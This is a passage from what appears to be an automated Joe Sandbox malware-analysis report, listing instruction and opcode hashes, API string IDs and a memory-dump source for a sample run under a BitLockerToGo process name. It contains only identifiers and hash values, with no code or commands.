                                    • Instruction ID: ef50ececf8a79ca7beca5c6d6679355bd9f35a1d9201c3a94a1cd21945f7898a
                                    • Opcode Fuzzy Hash: d1dbd9c61a9821e7e582cb2eddaf3c48000e544b93e4aa031ca08a8ab2d3d2bc
                                    • Instruction Fuzzy Hash: EE41A36010D7C1CEE3319B6C8858B9BBFE0AB92324F044B5DE4E9872D2C7759549CB63
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-3916222277
                                    • Opcode ID: 6b74aa769e522ce5e5dbed9e65d5a2f0b7b20348712096cec4f1e180e87f07b5
                                    • Instruction ID: dc9f1f2997ac640cb1449b50aaeb5cb946518cf2afc880307f5b61fb187a7bf4
                                    • Opcode Fuzzy Hash: 6b74aa769e522ce5e5dbed9e65d5a2f0b7b20348712096cec4f1e180e87f07b5
                                    • Instruction Fuzzy Hash: B841CFB09183049FDB00EF6CD985A1ABBF4FF88304F11496EE888DB351D771A958CB82